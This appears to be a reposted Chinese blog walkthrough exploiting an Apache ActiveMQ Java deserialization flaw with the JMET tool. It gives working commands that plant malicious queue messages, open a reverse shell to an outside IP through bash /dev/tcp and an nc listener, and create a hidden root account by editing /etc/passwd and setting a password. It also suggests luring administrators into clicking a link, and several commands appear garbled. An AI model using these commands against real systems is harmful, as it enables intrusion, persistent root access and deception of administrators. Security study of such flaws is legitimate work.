wget https:\/\/github.com\/matthiaskaiser\/jmet\/releases\/download\/0.1.0\/jmet-0.1.0-all.jar

mkdir external3.执行命令java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch \/tmp\/sucess" -Yp ROME 45.32.101.90 616164.此时会给目标的ActiveMQ添加一个名为事件的队列，可以我们通过http:\/\/45.32.101.90:8161\/admin\/browse.jsp?JMSDestination=event看到这个队列中所有消息：5.点击查看这条消息即可触发命令执行6.此时进入容器docker exec -it cc0e9385f975 \/bin\/bash7.可看到\/ tmp \/已成功创建，说明漏洞利用成功： 8.反弹shell:java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& \/dev\/tcp\/45.32.101.90\/12340>&1" -Yp ROME45.32.101.90 61616远程主机监听1234端口：nc -lvvp 1234即可看到反弹是shell:值得注意的是，通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。 9.添加用户执行jmet的命令添加test用户并将其添加到root组,返回http:\/\/192.168.221.185:8161\/admin\/browse.jsp?JMSDestination=event页面，点击一下消息，触发它： java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s \/bin\/bash -u 10010 test" -Yp ROME 45.32.101.90 61616让我们再将passwd中的test的uid修改为0，使它拥有root权限,返回http:\/\/192.168.221.185:8161\/admin\/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s\/test:x:10010\/test:x:0\/g" \/etc\/passwd" -Yp ROME 45.32.101.90 61616让我们再为test用户设置一个密码,返回http:\/\/192.168.221.185:8161\/admin\/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME 45.32.101.90 61616到此为止，一个权限为root，密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统，并且还是最高权限。0x03 参考链接https:\/\/www.blackhat.com\/docs\/us-16\/materials\/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf转自：https:\/\/www.cnblogs.com\/backlion\/p\/9970516.html<\/p>